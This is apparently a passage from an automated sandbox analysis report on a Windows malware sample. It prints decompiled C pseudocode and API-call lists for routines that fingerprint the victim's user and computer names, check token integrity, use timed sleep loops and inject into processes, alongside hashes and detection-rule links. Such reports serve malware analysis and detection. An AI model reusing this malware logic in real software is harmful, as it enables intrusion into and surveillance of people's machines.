                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: HeapName$AllocateComputerFreeUser
                                                            • String ID:
                                                            • API String ID: 3239747167-0
                                                            • Opcode ID: 36a2d8ba6709b23ead8c0c95234d1545a9f76cf818bc61b3126dd2a45a88eea4
                                                            • Instruction ID: 883b7658dd1f60f784a312a71acfd2cb0fe58fb862fefac935b10b21409201b6
                                                            • Opcode Fuzzy Hash: 36a2d8ba6709b23ead8c0c95234d1545a9f76cf818bc61b3126dd2a45a88eea4
                                                            • Instruction Fuzzy Hash: 8E310C75A00205EFE711DFA9DD80AAEB7F9FB44310F518469E905E3251DB34EE44AB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD5DCD, Relevance: 10.7, APIs: 7, Instructions: 191memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 64%
                                                            			E00DD5DCD(signed int __edx) {
				signed int _v8;
				long _v12;
				signed int _v16;
				long _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				void* __esi;
				void* _t27;
				long _t28;
				long _t31;
				intOrPtr _t32;
				void* _t36;
				signed int _t37;
				intOrPtr _t38;
				void* _t39;
				CHAR* _t42;
				long _t48;
				long _t49;
				void* _t54;
				void* _t56;
				intOrPtr _t64;
				void* _t67;
				long _t71;
				void* _t72;
				signed char _t74;
				intOrPtr _t76;
				signed int _t77;
				long _t82;
				long _t84;
				CHAR* _t87;
				void* _t88;

				_t79 = __edx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t27 = E00DD6296();
				if(_t27 != 0) {
					_t77 =  *0xdda2b4; // 0x2000000a
					_t73 = (_t77 & 0xf0000000) + _t27;
					 *0xdda2b4 = (_t77 & 0xf0000000) + _t27;
				}
				_t28 =  *0xdda148(0, 2); // executed
				_v20 = _t28;
				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
					_t31 = E00DD3822( &_v8,  &_v16); // executed
					_push(0);
					_t84 = _t31;
					_t32 =  *0xdda2d4; // 0x2bed5a8
					_push(0xdda2fc);
					_push(1);
					_t7 = _t32 + 0xddb5bc; // 0x4d283a53
					 *0xdda2f8 = 0xc;
					 *0xdda300 = 0;
					L00DD1D3B();
					_t36 = E00DD4E2A(_t79,  &_v24,  &_v12); // executed
					if(_t36 == 0) {
						CloseHandle(_v24);
					}
					if(_t84 != 5) {
						_t37 = _v16;
						__eflags = _t37;
						if(_t37 != 0) {
							E00DD2E33(_t37 ^ 0xe8fa7dd7,  &_v40);
							_t87 = E00DD77D7(0x27);
							__eflags = _t87;
							if(_t87 != 0) {
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								_t64 =  *0xdda2d4; // 0x2bed5a8
								_t18 = _t64 + 0xddb86f; // 0x78383025
								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
								_t88 = _t88 + 0x18;
							}
							 *0xdda32c = _t87;
						}
						_t38 = E00DD13AB();
						 *0xdda2c8 =  *0xdda2c8 ^ 0xe8fa7dd7;
						 *0xdda31c = _t38;
						_t39 = E00DD77D7(0x60);
						__eflags = _t39;
						 *0xdda37c = _t39;
						if(_t39 == 0) {
							_t84 = 8;
						} else {
							memset(_t39, 0, 0x60);
							_t54 =  *0xdda37c; // 0x39c9630
							_t88 = _t88 + 0xc;
							__imp__(_t54 + 0x40);
							_t56 =  *0xdda37c; // 0x39c9630
							 *_t56 = 0xddb85e;
							_t84 = 0;
						}
						__eflags = _t84;
						if(_t84 == 0) {
							_t42 = RtlAllocateHeap( *0xdda290, _t84, 0x52);
							__eflags = _t42;
							 *0xdda314 = _t42;
							if(_t42 == 0) {
								_t84 = 8;
							} else {
								_t74 =  *0xdda2b4; // 0x2000000a
								_t79 = _t74 & 0x000000ff;
								_t76 =  *0xdda2d4; // 0x2bed5a8
								_t19 = _t76 + 0xddb212; // 0x697a6f4d
								_t73 = _t19;
								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0xdd92a7);
							}
							__eflags = _t84;
							if(_t84 == 0) {
								asm("sbb eax, eax");
								E00DD2E33( ~_v8 &  *0xdda2c8, 0xdda00c); // executed
								_t84 = E00DD2654(_t73);
								__eflags = _t84;
								if(_t84 != 0) {
									goto L31;
								}
								_t48 = E00DD28C0();
								__eflags = _t48;
								if(_t48 != 0) {
									__eflags = _v8;
									_t82 = _v12;
									if(_v8 != 0) {
										L30:
										_t49 = E00DD6D30(_t79, _t82, _v8); // executed
										_t84 = _t49;
										goto L31;
									}
									__eflags = _t82;
									if(__eflags == 0) {
										goto L31;
									}
									_t23 = _t82 + 4; // 0x5
									_t84 = E00DD1D8C(__eflags, _t23);
									__eflags = _t84;
									if(_t84 == 0) {
										goto L31;
									}
									goto L30;
								}
								_t84 = 8;
							}
						}
					} else {
						_t71 = _v12;
						if(_t71 == 0) {
							L31:
							if(_v20 == 0 || _v20 == 1) {
								 *0xdda14c(); // executed
							}
							goto L35;
						}
						_t72 = _t71 + 4;
						do {
							_push(1);
							_push(_t72);
							_t67 = 5;
						} while (E00DD1697(_t67, 0) == 0x4c7);
					}
					goto L31;
				} else {
					_t84 = _t28;
					L35:
					return _t84;
				}
			}






































                                                            0x00dd5dcd
                                                            0x00dd5dd8
                                                            0x00dd5ddb
                                                            0x00dd5dde
                                                            0x00dd5de1
                                                            0x00dd5de8
                                                            0x00dd5dea
                                                            0x00dd5df6
                                                            0x00dd5df8
                                                            0x00dd5df8
                                                            0x00dd5e01
                                                            0x00dd5e09
                                                            0x00dd5e0c
                                                            0x00dd5e26
                                                            0x00dd5e2b
                                                            0x00dd5e2c
                                                            0x00dd5e2e
                                                            0x00dd5e33
                                                            0x00dd5e38
                                                            0x00dd5e3a
                                                            0x00dd5e41
                                                            0x00dd5e4b
                                                            0x00dd5e51
                                                            0x00dd5e5e
                                                            0x00dd5e65
                                                            0x00dd5e6a
                                                            0x00dd5e6a
                                                            0x00dd5e73
                                                            0x00dd5e9c
                                                            0x00dd5e9f
                                                            0x00dd5eac
                                                            0x00dd5eb3
                                                            0x00dd5ebf
                                                            0x00dd5ec1
                                                            0x00dd5ec3
                                                            0x00dd5ec8
                                                            0x00dd5ece
                                                            0x00dd5ed4
                                                            0x00dd5eda
                                                            0x00dd5edd
                                                            0x00dd5ee2
                                                            0x00dd5eea
                                                            0x00dd5eec
                                                            0x00dd5eec
                                                            0x00dd5eef
                                                            0x00dd5eef
                                                            0x00dd5ef5
                                                            0x00dd5efa
                                                            0x00dd5f02
                                                            0x00dd5f07
                                                            0x00dd5f0c
                                                            0x00dd5f0e
                                                            0x00dd5f13
                                                            0x00dd5f42
                                                            0x00dd5f15
                                                            0x00dd5f1a
                                                            0x00dd5f1f
                                                            0x00dd5f24
                                                            0x00dd5f2b
                                                            0x00dd5f31
                                                            0x00dd5f36
                                                            0x00dd5f3c
                                                            0x00dd5f3c
                                                            0x00dd5f43
                                                            0x00dd5f45
                                                            0x00dd5f54
                                                            0x00dd5f5a
                                                            0x00dd5f5c
                                                            0x00dd5f61
                                                            0x00dd5f8d
                                                            0x00dd5f63
                                                            0x00dd5f63
                                                            0x00dd5f69
                                                            0x00dd5f76
                                                            0x00dd5f7c
                                                            0x00dd5f7c
                                                            0x00dd5f84
                                                            0x00dd5f86
                                                            0x00dd5f8e
                                                            0x00dd5f90
                                                            0x00dd5f97
                                                            0x00dd5fa4
                                                            0x00dd5fae
                                                            0x00dd5fb0
                                                            0x00dd5fb2
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd5fb4
                                                            0x00dd5fb9
                                                            0x00dd5fbb
                                                            0x00dd5fc2
                                                            0x00dd5fc6
                                                            0x00dd5fc9
                                                            0x00dd5fde
                                                            0x00dd5fe2
                                                            0x00dd5fe7
                                                            0x00000000
                                                            0x00dd5fe7
                                                            0x00dd5fcb
                                                            0x00dd5fcd
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd5fcf
                                                            0x00dd5fd8
                                                            0x00dd5fda
                                                            0x00dd5fdc
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd5fdc
                                                            0x00dd5fbf
                                                            0x00dd5fbf
                                                            0x00dd5f90
                                                            0x00dd5e75
                                                            0x00dd5e75
                                                            0x00dd5e7a
                                                            0x00dd5fe9
                                                            0x00dd5fed
                                                            0x00dd5ff5
                                                            0x00dd5ff5
                                                            0x00000000
                                                            0x00dd5fed
                                                            0x00dd5e80
                                                            0x00dd5e83
                                                            0x00dd5e83
                                                            0x00dd5e85
                                                            0x00dd5e88
                                                            0x00dd5e90
                                                            0x00dd5e97
                                                            0x00000000
                                                            0x00dd5ffd
                                                            0x00dd5ffd
                                                            0x00dd6000
                                                            0x00dd6005
                                                            0x00dd6005

                                                            APIs
                                                              • Part of subcall function 00DD6296: GetModuleHandleA.KERNEL32(4C44544E,00000000,00DD5DE6,00000000,00000000,00000000,?,?,?,?,?,00DD66FE,?,00000001), ref: 00DD62A5
                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,00DDA2FC,00000000), ref: 00DD5E51
                                                            • CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,00DD66FE,?,00000001), ref: 00DD5E6A
                                                            • wsprintfA.USER32 ref: 00DD5EEA
                                                            • memset.NTDLL ref: 00DD5F1A
                                                            • RtlInitializeCriticalSection.NTDLL(039C95F0), ref: 00DD5F2B
                                                            • RtlAllocateHeap.NTDLL(00000008,00000052,00000060), ref: 00DD5F54
                                                            • wsprintfA.USER32 ref: 00DD5F84
                                                              • Part of subcall function 00DD2E33: GetUserNameW.ADVAPI32(00000000,00DD5FA9), ref: 00DD2E6A
                                                              • Part of subcall function 00DD2E33: RtlAllocateHeap.NTDLL(00000000,00DD5FA9), ref: 00DD2E81
                                                              • Part of subcall function 00DD2E33: GetUserNameW.ADVAPI32(00000000,00DD5FA9), ref: 00DD2E8E
                                                              • Part of subcall function 00DD2E33: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00DD5FA9,?,?,?,?,?,00DD66FE,?,00000001), ref: 00DD2EAF
                                                              • Part of subcall function 00DD2E33: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00DD2ED6
                                                              • Part of subcall function 00DD2E33: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00DD2EEA
                                                              • Part of subcall function 00DD2E33: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00DD2EF7
                                                              • Part of subcall function 00DD2E33: HeapFree.KERNEL32(00000000,00000000), ref: 00DD2F15
                                                              • Part of subcall function 00DD77D7: RtlAllocateHeap.NTDLL(00000000,00000000,00DD1275), ref: 00DD77E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
                                                            • String ID:
                                                            • API String ID: 2910951584-0
                                                            • Opcode ID: b66ed8306f14f44776140f208b677f2a006004aba055808ef4c25d3d9716c108
                                                            • Instruction ID: b05a0c38704bb7da30d618c3ed2e96117cbb1f710239d0d4d67fe9c58ed3b6b0
                                                            • Opcode Fuzzy Hash: b66ed8306f14f44776140f208b677f2a006004aba055808ef4c25d3d9716c108
                                                            • Instruction Fuzzy Hash: D751DC71901615ABDB20EBA9EC85EAEB7B8EB04700F188013F804EB394D775DE048BB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457B94E, Relevance: 10.6, APIs: 7, Instructions: 110memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 045692F3: GetProcAddress.KERNEL32(?,00000318), ref: 04569318
                                                              • Part of subcall function 045692F3: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 04569334
                                                            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0457B987
                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0457BA72
                                                              • Part of subcall function 045692F3: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 0456949E
                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 0457B9BD
                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0457B9C9
                                                            • lstrcmpi.KERNEL32(?,00000000), ref: 0457BA06
                                                            • StrChrA.SHLWAPI(?,0000002E), ref: 0457BA0F
                                                            • lstrcmpi.KERNEL32(?,00000000), ref: 0457BA21
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
                                                            • String ID:
                                                            • API String ID: 3901270786-0
                                                            • Opcode ID: 9b484acff1d9ec31f3349fa01aa6ae38ef2f1f60812a42f17cdc1e413e239287
                                                            • Instruction ID: 26c3f91a053b4521506af425e048e21f56caa6b1591e415b749337ff8fea2ebd
                                                            • Opcode Fuzzy Hash: 9b484acff1d9ec31f3349fa01aa6ae38ef2f1f60812a42f17cdc1e413e239287
                                                            • Instruction Fuzzy Hash: EE316F71508311AFD321DF15E944B6BBBE8FF88B58F000A29F884A7241D774FA04DBA6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045804BB, Relevance: 10.6, APIs: 7, Instructions: 84sleepthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0457AB41: memset.NTDLL ref: 0457AB4B
                                                            • OpenEventA.KERNEL32(00000002,00000000,0458C1E4,?,00000000,00000000,?,045722F6), ref: 04580555
                                                            • SetEvent.KERNEL32(00000000,?,045722F6), ref: 04580562
                                                            • Sleep.KERNEL32(00000BB8,?,045722F6), ref: 0458056D
                                                            • ResetEvent.KERNEL32(00000000,?,045722F6), ref: 04580574
                                                            • CloseHandle.KERNEL32(00000000,?,045722F6), ref: 0458057B
                                                            • GetShellWindow.USER32 ref: 04580586
                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 0458058D
                                                              • Part of subcall function 04581C1F: RegCloseKey.ADVAPI32(?), ref: 04581CA2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
                                                            • String ID:
                                                            • API String ID: 53838381-0
                                                            • Opcode ID: 5a0a5e5c339fb5c1e9662a1e844102d279ab661512a7c3c1e7044235290f2d08
                                                            • Instruction ID: f723d106479c9fea6dcecbb3696baa5013c76486f0dd8e7bed61860c5cafadb4
                                                            • Opcode Fuzzy Hash: 5a0a5e5c339fb5c1e9662a1e844102d279ab661512a7c3c1e7044235290f2d08
                                                            • Instruction Fuzzy Hash: 42218E72200111AFD2217AA6BC89E6B7BADFBC6A14F11510CF65AF3140DE38AC09B771
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD39E8, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00DD39E8(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0xdda2b4 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E00DD77D7(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E00DD77EC(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                                            0x00dd39f5
                                                            0x00dd39fc
                                                            0x00dd3a03
                                                            0x00dd3a17
                                                            0x00dd3a22
                                                            0x00dd3a3a
                                                            0x00dd3a47
                                                            0x00dd3a4a
                                                            0x00dd3a4f
                                                            0x00dd3a5a
                                                            0x00dd3a5e
                                                            0x00dd3a6d
                                                            0x00dd3a71
                                                            0x00dd3a8d
                                                            0x00dd3a8d
                                                            0x00dd3a91
                                                            0x00dd3a91
                                                            0x00dd3a96
                                                            0x00dd3a9a
                                                            0x00dd3aa0
                                                            0x00dd3aa1
                                                            0x00dd3aa8
                                                            0x00dd3aae

                                                            APIs
                                                            • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00DD3A1A
                                                            • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 00DD3A3A
                                                            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00DD3A4A
                                                            • CloseHandle.KERNEL32(00000000), ref: 00DD3A9A
                                                              • Part of subcall function 00DD77D7: RtlAllocateHeap.NTDLL(00000000,00000000,00DD1275), ref: 00DD77E3
                                                            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 00DD3A6D
                                                            • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00DD3A75
                                                            • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00DD3A85
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                            • String ID:
                                                            • API String ID: 1295030180-0
                                                            • Opcode ID: 0abf2698a3affe3744a9d11afa1342a116564afac0383813bfd15fc14d3142d4
                                                            • Instruction ID: cdd9d4ddeecb127522a28b32a0d13b0eaecb82022a5fad288326d862f6034c41
                                                            • Opcode Fuzzy Hash: 0abf2698a3affe3744a9d11afa1342a116564afac0383813bfd15fc14d3142d4
                                                            • Instruction Fuzzy Hash: 6A213975A00219FFEB10DF94DC84EAEBBB9EB08344F0080A6E551A6261D7719F44EB71
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD6632, Relevance: 10.6, APIs: 7, Instructions: 73sleepmemorytimeCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 73%
                                                            			E00DD6632(signed int __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				char _v32;
				long _v40;
				void* _t14;
				void* _t16;
				int _t18;
				signed int _t20;
				void* _t22;
				signed int _t23;
				intOrPtr _t25;
				unsigned int _t29;
				signed int _t34;
				signed int _t41;

				_t34 = __edx;
				_t14 = HeapCreate(0, 0x400000, 0); // executed
				 *0xdda290 = _t14;
				if(_t14 != 0) {
					 *0xdda180 = GetTickCount();
					_t16 = E00DD6707(_a4);
					if(_t16 != 0) {
						L10:
						return _t16;
					} else {
						goto L3;
					}
					do {
						L3:
						GetSystemTimeAsFileTime( &_v12);
						_t18 = SwitchToThread();
						_t29 = _v12.dwHighDateTime;
						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 5;
						_push(0);
						_push(0x13);
						_push(_t29 >> 5);
						_push(_t20);
						L00DD7F3A();
						_t41 = _t18 + _t20;
						_t22 = E00DD1228(_a4, _t41);
						_t23 = 3;
						Sleep(_t23 << (_t41 & 0x00000007)); // executed
					} while (_t22 == 1);
					_t25 =  *0xdda2ac; // 0x250
					_v32 = 0;
					if(_t25 != 0) {
						__imp__(_t25,  &_v32);
						if(_t25 == 0) {
							_v40 = 0;
						}
						if(_v40 != 0) {
							 *0xdda2b8 = 1; // executed
						}
					}
					_t16 = E00DD5DCD(_t34); // executed
					goto L10;
				}
				_t16 = 8;
				goto L10;
			}
















                                                            0x00dd6632
                                                            0x00dd6647
                                                            0x00dd664f
                                                            0x00dd6654
                                                            0x00dd6667
                                                            0x00dd666c
                                                            0x00dd6673
                                                            0x00dd66fe
                                                            0x00dd6704
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd6679
                                                            0x00dd6679
                                                            0x00dd667e
                                                            0x00dd6684
                                                            0x00dd668a
                                                            0x00dd6694
                                                            0x00dd6698
                                                            0x00dd6699
                                                            0x00dd669e
                                                            0x00dd669f
                                                            0x00dd66a0
                                                            0x00dd66a5
                                                            0x00dd66ab
                                                            0x00dd66b6
                                                            0x00dd66bd
                                                            0x00dd66c3
                                                            0x00dd66c8
                                                            0x00dd66cf
                                                            0x00dd66d3
                                                            0x00dd66db
                                                            0x00dd66e3
                                                            0x00dd66e5
                                                            0x00dd66e5
                                                            0x00dd66ed
                                                            0x00dd66ef
                                                            0x00dd66ef
                                                            0x00dd66ed
                                                            0x00dd66f9
                                                            0x00000000
                                                            0x00dd66f9
                                                            0x00dd6658
                                                            0x00000000

                                                            APIs
                                                            • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00DD6647
                                                            • GetTickCount.KERNEL32 ref: 00DD665E
                                                            • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 00DD667E
                                                            • SwitchToThread.KERNEL32(?,00000001), ref: 00DD6684
                                                            • _aullrem.NTDLL(?,?,00000013,00000000), ref: 00DD66A0
                                                            • Sleep.KERNELBASE(00000003,00000000,?,00000001), ref: 00DD66BD
                                                            • IsWow64Process.KERNEL32(00000250,?,?,00000001), ref: 00DD66DB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
                                                            • String ID:
                                                            • API String ID: 3690864001-0
                                                            • Opcode ID: 431dab03a3ccf96ae601f456584ab0b6855f9d3d10eac9fa6b7275f11bf349a2
                                                            • Instruction ID: 14854bb7c7bdf9b8bae4cac457b5d861bb4ffc77c03c43971194f368ba008435
                                                            • Opcode Fuzzy Hash: 431dab03a3ccf96ae601f456584ab0b6855f9d3d10eac9fa6b7275f11bf349a2
                                                            • Instruction Fuzzy Hash: 622190B2641304AFC710AFB5EC99A6ABBE8EB44351F04853FF515C2350E735D8448BB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD637D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 64%
                                                            			E00DD637D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0xdda2d4; // 0x2bed5a8
				_t1 = _t9 + 0xddb61b; // 0x253d7325
				_t36 = 0;
				_t28 = E00DD2F3E(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x39c9631
					_t40 = E00DD77D7(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E00DD488A(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E00DD77EC(_t40);
						_t42 = E00DD1F34(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E00DD77EC(_t36);
							_t36 = _t42;
						}
						_t43 = E00DD6006(_t36, _t33);
						if(_t43 != 0) {
							E00DD77EC(_t36);
							_t36 = _t43;
						}
					}
					E00DD77EC(_t28);
				}
				return _t36;
			}
















                                                            0x00dd637d
                                                            0x00dd6380
                                                            0x00dd6381
                                                            0x00dd6388
                                                            0x00dd638f
                                                            0x00dd6396
                                                            0x00dd639a
                                                            0x00dd63a1
                                                            0x00dd63a8
                                                            0x00dd63ad
                                                            0x00dd63b5
                                                            0x00dd63bf
                                                            0x00dd63c3
                                                            0x00dd63c7
                                                            0x00dd63cd
                                                            0x00dd63d2
                                                            0x00dd63dc
                                                            0x00dd63e2
                                                            0x00dd63e4
                                                            0x00dd63fb
                                                            0x00dd63ff
                                                            0x00dd6402
                                                            0x00dd6407
                                                            0x00dd6407
                                                            0x00dd6410
                                                            0x00dd6414
                                                            0x00dd6417
                                                            0x00dd641c
                                                            0x00dd641c
                                                            0x00dd6414
                                                            0x00dd641f
                                                            0x00dd6424
                                                            0x00dd642a

                                                            APIs
                                                              • Part of subcall function 00DD2F3E: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00DD6396,253D7325,00000000,00000000,?,00000000,00DD72E3), ref: 00DD2FA5
                                                              • Part of subcall function 00DD2F3E: sprintf.NTDLL ref: 00DD2FC6
                                                            • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00DD72E3,00000000,039C9630), ref: 00DD63A8
                                                            • lstrlen.KERNEL32(00000000,?,00000000,00DD72E3,00000000,039C9630), ref: 00DD63B0
                                                              • Part of subcall function 00DD77D7: RtlAllocateHeap.NTDLL(00000000,00000000,00DD1275), ref: 00DD77E3
                                                            • strcpy.NTDLL ref: 00DD63C7
                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 00DD63D2
                                                              • Part of subcall function 00DD488A: lstrlen.KERNEL32(00000000,00000000,00DD72E3,00000000,?,00DD63E1,00000000,00DD72E3,?,00000000,00DD72E3,00000000,039C9630), ref: 00DD489B
                                                              • Part of subcall function 00DD77EC: RtlFreeHeap.NTDLL(00000000,00000000,00DD1333,00000000,00000000,?,00000000,?,?,?,?,?,00DD66B0,00000000,?,00000001), ref: 00DD77F8
                                                            • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00DD72E3,?,00000000,00DD72E3,00000000,039C9630), ref: 00DD63EF
                                                              • Part of subcall function 00DD1F34: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,00DD63FB,00000000,?,00000000,00DD72E3,00000000,039C9630), ref: 00DD1F3E
                                                              • Part of subcall function 00DD1F34: _snprintf.NTDLL ref: 00DD1F9C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                            • String ID: =
                                                            • API String ID: 2864389247-1428090586
                                                            • Opcode ID: 26f07193c4cab07c06d4088e62ee196fb74eaefeb30977765352baa7a5061a0b
                                                            • Instruction ID: 4824764edd9ccb04f54fd2bc2f5a58da81af54c99cef2ba02283c3ebea52f499
                                                            • Opcode Fuzzy Hash: 26f07193c4cab07c06d4088e62ee196fb74eaefeb30977765352baa7a5061a0b
                                                            • Instruction Fuzzy Hash: 5911703B5062257747126BB89C85C6F3BADDF897607094457F500E7302EA39CD0297F5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04579496, Relevance: 9.1, APIs: 6, Instructions: 125threadsynchronizationinjectionCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.NTDLL ref: 045794B9
                                                              • Part of subcall function 0457527F: OpenProcess.KERNEL32(00000400,00000000,?,00000000,00000000,?,?,045613A2,00000000,0458C16C,00000000,?), ref: 0457529A
                                                              • Part of subcall function 0457527F: IsWow64Process.KERNEL32(00000000,?,00000000,00000000,?,?,045613A2,00000000,0458C16C,00000000,?), ref: 045752AB
